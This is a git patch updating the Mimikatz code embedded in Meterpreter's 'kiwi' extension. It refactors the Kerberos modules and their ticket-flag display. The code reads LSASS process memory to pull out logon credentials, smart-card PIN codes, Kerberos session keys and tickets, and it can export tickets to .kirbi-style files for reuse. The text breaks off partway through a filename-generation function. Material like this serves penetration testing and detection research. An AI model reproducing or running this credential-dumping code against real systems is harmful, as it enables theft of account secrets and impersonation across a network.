From 5b721a8fe9565ce54ee5ca728fa46950429466d6 Mon Sep 17 00:00:00 2001 From: OJ Date: Tue, 8 Jul 2014 16:48:11 +1000 Subject: [PATCH] Updated to Mimikatz commit e85d87f6bb2e0afa5c57f22c73d12b8e25e84c9f This comes with some other changes as well which include code changes that were probably made to the kerberos code prior to moving to github. As a result, the actual changset was lots because the history of mimikatz wasn't imported into github, and the change history is no longer available on google code. --- .../modules/kerberos/khul_m_kerberos.c | 16 +- .../modules/kerberos/khul_m_kerberos_ticket.c | 26 +- .../modules/kerberos/khul_m_kerberos_ticket.h | 2 +- .../kiwi/mimikatz/modules/kuhl_m_privilege.h | 8 +- .../modules/sekurlsa/kuhl_m_sekurlsa.c | 17 + .../modules/sekurlsa/kuhl_m_sekurlsa_utils.c | 17 - .../modules/sekurlsa/kuhl_m_sekurlsa_utils.h | 2 - .../packages/kuhl_m_sekurlsa_kerberos.c | 368 ++++++++++-------- .../packages/kuhl_m_sekurlsa_kerberos.h | 29 +- 9 files changed, 257 insertions(+), 228 deletions(-) diff --git a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/kerberos/khul_m_kerberos.c b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/kerberos/khul_m_kerberos.c index fee1fea5..a5586915 100644 --- a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/kerberos/khul_m_kerberos.c +++ b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/kerberos/khul_m_kerberos.c @@ -199,7 +199,7 @@ NTSTATUS kuhl_m_kerberos_list_tickets(PKERB_CALLBACK_CTX callbackCtx, BOOL bExpo PKERB_QUERY_TKT_CACHE_EX_RESPONSE pKerbCacheResponse; PKERB_RETRIEVE_TKT_REQUEST pKerbRetrieveRequest = NULL; PKERB_RETRIEVE_TKT_RESPONSE pKerbRetrieveResponse = NULL; - DWORD szData, i, j; + DWORD szData, i; status = LsaCallKerberosPackage(&kerbCacheRequest, sizeof(KERB_QUERY_TKT_CACHE_REQUEST), (PVOID *) &pKerbCacheResponse, &szData, &packageStatus); if(NT_SUCCESS(status)) @@ -216,13 +216,7 @@ NTSTATUS kuhl_m_kerberos_list_tickets(PKERB_CALLBACK_CTX callbackCtx, BOOL bExpo kprintf(L"\n Server Name : %wZ @ %wZ", &pKerbCacheResponse->Tickets[i].ServerName, &pKerbCacheResponse->Tickets[i].ServerRealm); kprintf(L"\n Client Name : %wZ @ %wZ", &pKerbCacheResponse->Tickets[i].ClientName, &pKerbCacheResponse->Tickets[i].ClientRealm); kprintf(L"\n Flags %08x : ", pKerbCacheResponse->Tickets[i].TicketFlags); - for (j = 0; j < 16; j++) - { - if ((pKerbCacheResponse->Tickets[i].TicketFlags >> (j + 16)) & 1) - { - kprintf(L"%s ; ", TicketFlagsToStrings[j]); - } - } + kuhl_m_kerberos_ticket_displayFlags(pKerbCacheResponse->Tickets[i].TicketFlags); if (bExport) { @@ -273,7 +267,7 @@ NTSTATUS kuhl_m_kerberos_list(int argc, wchar_t * argv[]) PKERB_QUERY_TKT_CACHE_EX_RESPONSE pKerbCacheResponse; PKERB_RETRIEVE_TKT_REQUEST pKerbRetrieveRequest; PKERB_RETRIEVE_TKT_RESPONSE pKerbRetrieveResponse; - DWORD szData, i, j; + DWORD szData, i; wchar_t * filename; BOOL export = kull_m_string_args_byName(argc, argv, L"export", NULL, NULL); @@ -292,9 +286,7 @@ NTSTATUS kuhl_m_kerberos_list(int argc, wchar_t * argv[]) kprintf(L"\n Server Name : %wZ @ %wZ", &pKerbCacheResponse->Tickets[i].ServerName, &pKerbCacheResponse->Tickets[i].ServerRealm); kprintf(L"\n Client Name : %wZ @ %wZ", &pKerbCacheResponse->Tickets[i].ClientName, &pKerbCacheResponse->Tickets[i].ClientRealm); kprintf(L"\n Flags %08x : ", pKerbCacheResponse->Tickets[i].TicketFlags); - for(j = 0; j < 16; j++) - if((pKerbCacheResponse->Tickets[i].TicketFlags >> (j + 16)) & 1) - kprintf(L"%s ; ", TicketFlagsToStrings[j]); + kuhl_m_kerberos_ticket_displayFlags(pKerbCacheResponse->Tickets[i].TicketFlags); if(export) { diff --git a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/kerberos/khul_m_kerberos_ticket.c b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/kerberos/khul_m_kerberos_ticket.c index f234e219..632fdd48 100644 --- a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/kerberos/khul_m_kerberos_ticket.c +++ b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/kerberos/khul_m_kerberos_ticket.c @@ -5,16 +5,8 @@ */ #include "khul_m_kerberos_ticket.h" -const PCWCHAR TicketFlagsToStrings[] = { - L"name_canonicalize", L"?", L"ok_as_delegate", L"?", - L"hw_authent", L"pre_authent", L"initial", L"renewable", - L"invalid", L"postdated", L"may_postdate", L"proxy", - L"proxiable", L"forwarded", L"forwardable", L"reserved", -}; - void kuhl_m_kerberos_ticket_display(PKIWI_KERBEROS_TICKET ticket, BOOL encodedTicketToo) { - DWORD i; kprintf(L"\n\t Start/End/MaxRenew: "); kull_m_string_displayLocalFileTime(&ticket->StartTime); kprintf(L" ; "); kull_m_string_displayLocalFileTime(&ticket->EndTime); kprintf(L" ; "); @@ -26,9 +18,7 @@ void kuhl_m_kerberos_ticket_display(PKIWI_KERBEROS_TICKET ticket, BOOL encodedTi if(ticket->Description.Buffer) kprintf(L" ( %wZ )", &ticket->Description); kprintf(L"\n\t Flags %08x : ", ticket->TicketFlags); - for(i = 0; i < 16; i++) - if((ticket->TicketFlags >> (i + 16)) & 1) - kprintf(L"%s ; ", TicketFlagsToStrings[i]); + kuhl_m_kerberos_ticket_displayFlags(ticket->TicketFlags); kprintf(L"\n\t Session Key (%02x) : ", ticket->KeyType); if(ticket->Key.Value) kull_m_string_wprintf_hex(ticket->Key.Value, ticket->Key.Length, 1); @@ -43,6 +33,20 @@ void kuhl_m_kerberos_ticket_display(PKIWI_KERBEROS_TICKET ticket, BOOL encodedTi else kprintf(L"[...]"); } +const PCWCHAR TicketFlagsToStrings[] = { + L"name_canonicalize", L"?", L"ok_as_delegate", L"?", + L"hw_authent", L"pre_authent", L"initial", L"renewable", + L"invalid", L"postdated", L"may_postdate", L"proxy", + L"proxiable", L"forwarded", L"forwardable", L"reserved", +}; +void kuhl_m_kerberos_ticket_displayFlags(ULONG flags) +{ + DWORD i; + for(i = 0; i < 16; i++) + if((flags >> (i + 16)) & 1) + kprintf(L"%s ; ", TicketFlagsToStrings[i]); +} + void kuhl_m_kerberos_ticket_displayExternalName(IN LPCWSTR prefix, IN PKERB_EXTERNAL_NAME pExternalName, IN PUNICODE_STRING pDomain) { USHORT i; diff --git a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/kerberos/khul_m_kerberos_ticket.h b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/kerberos/khul_m_kerberos_ticket.h index 31b0f02c..51d3ebcb 100644 --- a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/kerberos/khul_m_kerberos_ticket.h +++ b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/kerberos/khul_m_kerberos_ticket.h @@ -99,8 +99,8 @@ typedef struct _KIWI_KERBEROS_TICKET { KIWI_KERBEROS_BUFFER Ticket; } KIWI_KERBEROS_TICKET, *PKIWI_KERBEROS_TICKET; -const PCWCHAR TicketFlagsToStrings[]; void kuhl_m_kerberos_ticket_display(PKIWI_KERBEROS_TICKET ticket, BOOL encodedTicketToo); +void kuhl_m_kerberos_ticket_displayFlags(ULONG flags); void kuhl_m_kerberos_ticket_displayExternalName(IN LPCWSTR prefix, IN PKERB_EXTERNAL_NAME pExternalName, IN PUNICODE_STRING pDomain); PDIRTY_ASN1_SEQUENCE_EASY kuhl_m_kerberos_ticket_createAppKrbCred(PKIWI_KERBEROS_TICKET ticket); diff --git a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/kuhl_m_privilege.h b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/kuhl_m_privilege.h index f38ac664..8169628d 100644 --- a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/kuhl_m_privilege.h +++ b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/kuhl_m_privilege.h @@ -28,17 +28,17 @@ NTSTATUS kuhl_m_privilege_simple(ULONG privId); //#define SE_INC_BASE_PRIORITY //#define SE_CREATE_PAGEFILE //#define SE_CREATE_PERMANENT -//#define SE_BACKUP -//#define SE_RESTORE +#define SE_BACKUP 17 +#define SE_RESTORE 18 //#define SE_SHUTDOWN #define SE_DEBUG 20 -//#define SE_AUDIT +#define SE_AUDIT 21 //#define SE_SYSTEM_ENVIRONMENT //#define SE_CHANGE //#define SE_REMOTE_SHUTDOWN //#define SE_UNDOCK //#define SE_SYNC_AGENT -//#define SE_ENABLE_DELEGATION +#define SE_ENABLE_DELEGATION 27 //#define SE_MANAGE_VOLUME #define SE_IMPERSONATE 29 //#define SE_CREATE_GLOBAL diff --git a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c index f3646ac6..18e480e3 100644 --- a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c +++ b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c @@ -400,6 +400,23 @@ BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_logondata(IN PKIWI_BASIC_SECURITY_LO return TRUE; } +const wchar_t * KUHL_M_SEKURLSA_LOGON_TYPE[] = { + L"UndefinedLogonType", + L"Unknown !", + L"Interactive", + L"Network", + L"Batch", + L"Service", + L"Proxy", + L"Unlock", + L"NetworkCleartext", + L"NewCredentials", + L"RemoteInteractive", + L"CachedInteractive", + L"CachedRemoteInteractive", + L"CachedUnlock", +}; + void kuhl_m_sekurlsa_printinfos_logonData(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData) { kprintf(L"\nAuthentication Id : %u ; %u (%08x:%08x)\n" diff --git a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c index 8def6dd3..dadb7cdf 100644 --- a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c +++ b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c @@ -34,23 +34,6 @@ KULL_M_PATCH_GENERIC LsaSrvReferences[] = { PLIST_ENTRY LogonSessionList = NULL; PULONG LogonSessionListCount = NULL; -const wchar_t * KUHL_M_SEKURLSA_LOGON_TYPE[] = { - L"UndefinedLogonType", - L"Unknown !", - L"Interactive", - L"Network", - L"Batch", - L"Service", - L"Proxy", - L"Unlock", - L"NetworkCleartext", - L"NewCredentials", - L"RemoteInteractive", - L"CachedInteractive", - L"CachedRemoteInteractive", - L"CachedUnlock", -}; - BOOL kuhl_m_sekurlsa_utils_search(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKUHL_M_SEKURLSA_LIB pLib) { PVOID *pLogonSessionListCount = (cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_2K3) ? NULL : ((PVOID *) &LogonSessionListCount); diff --git a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.h b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.h index 31ac5255..332e6fb4 100644 --- a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.h +++ b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.h @@ -21,8 +21,6 @@ BOOL kuhl_m_sekurlsa_utils_search_generic(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKUHL void kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(PVOID BaseAddress, PLSA_UNICODE_STRING String, BOOL relative); BOOL kuhl_m_sekurlsa_utils_getSid(IN PSID * pSid, IN PKULL_M_MEMORY_HANDLE source); -const wchar_t * KUHL_M_SEKURLSA_LOGON_TYPE[]; - typedef struct _KIWI_MSV1_0_PRIMARY_CREDENTIALS { struct _KIWI_MSV1_0_PRIMARY_CREDENTIALS *next; ANSI_STRING Primary; diff --git a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c index b1e8f221..4ce1768c 100644 --- a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c +++ b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c @@ -53,6 +53,7 @@ const KERB_INFOS kerbHelper[] = { FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_51, RenewUntil), FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_51, TicketEncType), FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_51, Ticket), + FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_51, TicketKvno), sizeof(KIWI_KERBEROS_INTERNAL_TICKET_51), }, { @@ -80,6 +81,7 @@ const KERB_INFOS kerbHelper[] = { FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_52, RenewUntil), FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_52, TicketEncType), FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_52, Ticket), + FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_52, TicketKvno), sizeof(KIWI_KERBEROS_INTERNAL_TICKET_52), }, { @@ -107,6 +109,7 @@ const KERB_INFOS kerbHelper[] = { FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, RenewUntil), FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, TicketEncType), FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, Ticket), + FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, TicketKvno), sizeof(KIWI_KERBEROS_INTERNAL_TICKET_6), }, }; @@ -126,236 +129,261 @@ LONG kuhl_m_sekurlsa_kerberos_enum(PKUHL_M_SEKURLSA_EXTERNAL callback, LPVOID st void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_kerberos(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData) { - KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL}; - KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &hLocalMemory}, aLsassMemory = {NULL, pData->cLsass->hLsassMem}; - UNICODE_STRING pinCode; - - if(kuhl_m_sekurlsa_kerberos_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_kerberos_package.Module, KerberosReferences, sizeof(KerberosReferences) / sizeof(KULL_M_PATCH_GENERIC), &KerbLogonSessionListOrTable, NULL, &KerbOffsetIndex)) - { - aLsassMemory.address = KerbLogonSessionListOrTable; - if(pData->cLsass->osContext.MajorVersion < 6) - aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, kerbHelper[KerbOffsetIndex].offsetLuid, pData->LogonId); - else - aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromAVLByLuid(&aLsassMemory, kerbHelper[KerbOffsetIndex].offsetLuid, pData->LogonId); - - if(aLsassMemory.address) - { - if(aLocalMemory.address = LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].structSize)) - { - if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, kerbHelper[KerbOffsetIndex].structSize)) - { - kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) ((PBYTE) aLocalMemory.address + kerbHelper[KerbOffsetIndex].offsetCreds), pData->LogonId, 0, externalCallback, externalCallbackData); - if(aLsassMemory.address = (*(PUNICODE_STRING *) ((PBYTE) aLocalMemory.address + kerbHelper[KerbOffsetIndex].offsetPin))) - { - aLocalMemory.address = &pinCode; - if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(UNICODE_STRING))) - kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) &pinCode, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE | ((pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_VISTA) ? KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT : 0), externalCallback, externalCallbackData); - } - } - LocalFree(aLocalMemory.address); - } - } - } else kprintf(L"KO"); + kuhl_m_sekurlsa_enum_generic_callback_kerberos(pData, NULL); } NTSTATUS kuhl_m_sekurlsa_kerberos_tickets(int argc, wchar_t * argv[]) { - kuhl_m_sekurlsa_enum(kuhl_m_sekurlsa_enum_callback_kerberos_tickets, NULL); + kuhl_m_sekurlsa_enum(kuhl_m_sekurlsa_enum_callback_kerberos_tickets, &argc); return STATUS_SUCCESS; } BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_kerberos_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData) { - KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL}; - KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &hLocalMemory}, aLsassMemory = {NULL, pData->cLsass->hLsassMem}; + kuhl_m_sekurlsa_enum_generic_callback_kerberos(pData, pOptionalData); + return TRUE; +} + +const wchar_t * KUHL_M_SEKURLSA_KERBEROS_TICKET_TYPE[] = {L"Ticket Granting Service", L"Client Ticket ?", L"Ticket Granting Ticket",}; +void kuhl_m_sekurlsa_enum_generic_callback_kerberos(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData) +{ + KULL_M_MEMORY_HANDLE hLocalMemory = { KULL_M_MEMORY_TYPE_OWN, NULL }; + KULL_M_MEMORY_ADDRESS aLocalMemory = { NULL, &hLocalMemory }, aLsassMemory = { NULL, pData->cLsass->hLsassMem }; + UNICODE_STRING pinCode; DWORD i; - kprintf(L"\nAuthentication Id : %u ; %u (%08x:%08x)\n" - L"Session : %s from %u\n" - L"User Name : %wZ\n" - L"Domain : %wZ\n" - , pData->LogonId->HighPart, pData->LogonId->LowPart, pData->LogonId->HighPart, pData->LogonId->LowPart, KUHL_M_SEKURLSA_LOGON_TYPE[pData->LogonType], pData->Session, pData->UserName, pData->LogonDomain); - - if(kuhl_m_sekurlsa_kerberos_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_kerberos_package.Module, KerberosReferences, sizeof(KerberosReferences) / sizeof(KULL_M_PATCH_GENERIC), &KerbLogonSessionListOrTable, NULL, &KerbOffsetIndex)) + if (kuhl_m_sekurlsa_kerberos_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_kerberos_package.Module, KerberosReferences, sizeof(KerberosReferences) / sizeof(KULL_M_PATCH_GENERIC), &KerbLogonSessionListOrTable, NULL, &KerbOffsetIndex)) { aLsassMemory.address = KerbLogonSessionListOrTable; - if(pData->cLsass->osContext.MajorVersion < 6) + if (pData->cLsass->osContext.MajorVersion < 6) aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, kerbHelper[KerbOffsetIndex].offsetLuid, pData->LogonId); else aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromAVLByLuid(&aLsassMemory, kerbHelper[KerbOffsetIndex].offsetLuid, pData->LogonId); - - if(aLsassMemory.address) + + if (aLsassMemory.address) { - if(aLocalMemory.address = LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].structSize)) + if (aLocalMemory.address = LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].structSize)) { - if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, kerbHelper[KerbOffsetIndex].structSize)) + if (kull_m_memory_copy(&aLocalMemory, &aLsassMemory, kerbHelper[KerbOffsetIndex].structSize)) { - for(i = 0; i < 3; i++) + if (pOptionalData) // ticket mode { - kprintf(L"\n\tTickets group %u", i); - kuhl_m_sekurlsa_kerberos_enum_tickets(pData, (PBYTE) aLsassMemory.address + kerbHelper[KerbOffsetIndex].offsetTickets[i]); - kprintf(L"\n"); + kuhl_m_sekurlsa_printinfos_logonData(pData); + + for (i = 0; i < 3; i++) + { + kprintf(L"\n\tGroup %u - %s", i, KUHL_M_SEKURLSA_KERBEROS_TICKET_TYPE[i]); + kuhl_m_sekurlsa_kerberos_enum_tickets(pData, i, (PBYTE)aLsassMemory.address + kerbHelper[KerbOffsetIndex].offsetTickets[i], *(int *)pOptionalData); + kprintf(L"\n"); + } + } + else // password mode + { + kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL)((PBYTE)aLocalMemory.address + kerbHelper[KerbOffsetIndex].offsetCreds), pData->LogonId, 0, NULL, NULL); + if (aLsassMemory.address = (*(PUNICODE_STRING *)((PBYTE)aLocalMemory.address + kerbHelper[KerbOffsetIndex].offsetPin))) + { + aLocalMemory.address = &pinCode; + if (kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(UNICODE_STRING))) + kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL)&pinCode, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE | ((pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_VISTA) ? KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT : 0), NULL, NULL); + } } } LocalFree(aLocalMemory.address); } } - } else kprintf(L"KO"); - - return TRUE; + } + else kprintf(L"KO"); } -static const PCWCHAR TicketFlagsToStrings[] = { - L"name_canonicalize", - L"?", - L"ok_as_delegate", - L"?", - L"hw_authent", - L"pre_authent", - L"initial", - L"renewable", - L"invalid", - L"postdated", - L"may_postdate", - L"proxy", - L"proxiable", - L"forwarded", - L"forwardable", - L"reserved", -}; - -void kuhl_m_sekurlsa_kerberos_enum_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN PVOID tickets) +void kuhl_m_sekurlsa_kerberos_enum_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN DWORD grp, IN PVOID tickets, IN BOOL isFile) { PVOID pStruct, pRef = tickets; - KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL}; - KULL_M_MEMORY_ADDRESS data = {&pStruct, &hBuffer}, aTicket = {NULL, &hBuffer}, aLocalBuffer = {NULL, &hBuffer}, aKeyBuffer = {NULL, &hBuffer}, aLsassBuffer = {tickets, pData->cLsass->hLsassMem}; - DWORD TicketFlags, nbTickets = 0, i; - KIWI_KERBEROS_BUFFER key, ticket; - PUNICODE_STRING pDesc; - LPBYTE pTicket; + KULL_M_MEMORY_HANDLE hBuffer = { KULL_M_MEMORY_TYPE_OWN, NULL }; + KULL_M_MEMORY_ADDRESS data = { &pStruct, &hBuffer }, aTicket = { NULL, &hBuffer }, aLsassBuffer = { tickets, pData->cLsass->hLsassMem }; + DWORD nbTickets = 0; + PKIWI_KERBEROS_TICKET pKiwiTicket; + PDIRTY_ASN1_SEQUENCE_EASY App_KrbCred; + wchar_t * filename; - if(aTicket.address = LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].structTicketSize)) + if (aTicket.address = LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].structTicketSize)) { - if(kull_m_memory_copy(&data, &aLsassBuffer, sizeof(PVOID))) + if (kull_m_memory_copy(&data, &aLsassBuffer, sizeof(PVOID))) { data.address = pStruct; data.hMemory = pData->cLsass->hLsassMem; - while(data.address != pRef) + while (data.address != pRef) { - if(kull_m_memory_copy(&aTicket, &data, kerbHelper[KerbOffsetIndex].structTicketSize)) + if (kull_m_memory_copy(&aTicket, &data, kerbHelper[KerbOffsetIndex].structTicketSize)) { - pTicket = (LPBYTE) aTicket.address; - kprintf(L"\n\t [%08x]", nbTickets++); - - kprintf(L"\n\t Start/End/MaxRenew: "); - kuhl_m_sekurlsa_kerberos_time((PFILETIME) (pTicket + kerbHelper[KerbOffsetIndex].offsetStartTime)); - kuhl_m_sekurlsa_kerberos_time((PFILETIME) (pTicket + kerbHelper[KerbOffsetIndex].offsetEndTime)); - kuhl_m_sekurlsa_kerberos_time((PFILETIME) (pTicket + kerbHelper[KerbOffsetIndex].offsetRenewUntil)); + kprintf(L"\n\t [%08x]", nbTickets); + if (pKiwiTicket = kuhl_m_sekurlsa_kerberos_createTicket((LPBYTE)aTicket.address, pData->cLsass->hLsassMem)) + { + kuhl_m_kerberos_ticket_display(pKiwiTicket, FALSE); + if (isFile) + { + if (filename = kuhl_m_sekurlsa_kerberos_generateFileName(pData->LogonId, grp, nbTickets, pKiwiTicket, MIMIKATZ_KERBEROS_EXT)) + { + if (App_KrbCred = kuhl_m_kerberos_ticket_createAppKrbCred(pKiwiTicket)) + { + if (kull_m_file_writeData(filename, (PBYTE)App_KrbCred, kull_m_asn1_getSize(App_KrbCred))) + kprintf(L"\n\t * Saved to file %s !\n", filename); + else PRINT_ERROR_AUTO(L"kull_m_file_writeData"); + LocalFree(App_KrbCred); + } + LocalFree(filename); + } + } - TicketFlags = *(PULONG) ((pTicket + kerbHelper[KerbOffsetIndex].offsetTicketFlags)) >> 16; - kprintf(L"\n\t Flags %08x : ", TicketFlags); - for(i = 0; i < 16; i++) - if((TicketFlags >> i) & 1) - kprintf(L"%s ; ", TicketFlagsToStrings[i]); - - kprintf(L"\n\t Service Name "); - kuhl_m_sekurlsa_kerberos_names(pData->cLsass, *(PKERB_EXTERNAL_NAME *) (pTicket + kerbHelper[KerbOffsetIndex].offsetServiceName), (PUNICODE_STRING) (pTicket + kerbHelper[KerbOffsetIndex].offsetDomainName)); - kprintf(L"\n\t Target Name "); - kuhl_m_sekurlsa_kerberos_names(pData->cLsass, *(PKERB_EXTERNAL_NAME *) (pTicket + kerbHelper[KerbOffsetIndex].offsetTargetName), (PUNICODE_STRING) (pTicket + kerbHelper[KerbOffsetIndex].offsetTargetDomainName)); - kprintf(L"\n\t Client Name "); - kuhl_m_sekurlsa_kerberos_names(pData->cLsass, *(PKERB_EXTERNAL_NAME *) (pTicket + kerbHelper[KerbOffsetIndex].offsetClientName), (PUNICODE_STRING) (pTicket + kerbHelper[KerbOffsetIndex].offsetAltTargetDomainName)); - - pDesc = (PUNICODE_STRING) (pTicket + kerbHelper[KerbOffsetIndex].offsetDescription); - kull_m_string_getUnicodeString(pDesc, pData->cLsass->hLsassMem); - kprintf(L" ( %wZ )", pDesc); - LocalFree(pDesc->Buffer); - - kprintf(L"\n\t Session Key (%u) : ", *(ULONG *) (pTicket + kerbHelper[KerbOffsetIndex].offsetKeyType)); - key = *(KIWI_KERBEROS_BUFFER *) (pTicket + kerbHelper[KerbOffsetIndex].offsetKey); - if(aKeyBuffer.address = LocalAlloc(LPTR, key.Length)) - { - if(aLsassBuffer.address = key.Value) - if(kull_m_memory_copy(&aKeyBuffer, &aLsassBuffer, key.Length)) - kull_m_string_wprintf_hex(aKeyBuffer.address, key.Length, 1); - LocalFree(aKeyBuffer.address); + kuhl_m_sekurlsa_kerberos_freeTicket(pKiwiTicket); } - kprintf(L"\n\t Ticket (%u) : ", *(ULONG *) (pTicket + kerbHelper[KerbOffsetIndex].offsetTicketEncType)); - ticket = *(KIWI_KERBEROS_BUFFER *) (pTicket + kerbHelper[KerbOffsetIndex].offsetTicket); - if(aLocalBuffer.address = LocalAlloc(LPTR, ticket.Length)) - { - if(aLsassBuffer.address = ticket.Value) - if(kull_m_memory_copy(&aLocalBuffer, &aLsassBuffer, ticket.Length)) - kull_m_string_wprintf_hex(aLocalBuffer.address, ticket.Length, 1); - LocalFree(aLocalBuffer.address); - } - data.address = ((PLIST_ENTRY) (aTicket.address))->Flink; + data.address = ((PLIST_ENTRY)(aTicket.address))->Flink; } else break; + nbTickets++; } } LocalFree(aTicket.address); } } -void kuhl_m_sekurlsa_kerberos_names(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PKERB_EXTERNAL_NAME pName, IN PUNICODE_STRING pDomain) +wchar_t * kuhl_m_sekurlsa_kerberos_generateFileName(PLUID LogonId, const DWORD grp, const DWORD index, PKIWI_KERBEROS_TICKET ticket, LPCWSTR ext) { - KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL}; - KULL_M_MEMORY_ADDRESS aName = {pName, cLsass->hLsassMem}, aLocalBuffer = {NULL, &hBuffer}, aLocalStrings = {NULL, &hBuffer}; - PUNICODE_STRING names; - USHORT count, i; - SHORT type; - SIZE_T buffSize; + wchar_t * buffer; + size_t charCount = 0x1000; + BOOL isLong = (ticket->ClientName) && (ticket->ClientName->NameType == KRB_NT_PRINCIPAL) && (ticket->ClientName->NameCount == 1) && (ticket->ServiceName) && ((ticket->ServiceName->NameType == KRB_NT_SRV_INST) || (ticket->ServiceName->NameType == 